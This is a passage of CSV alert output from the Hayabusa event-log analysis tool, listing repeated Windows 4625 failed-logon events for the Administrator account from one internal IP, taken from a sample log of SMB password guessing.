+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.918 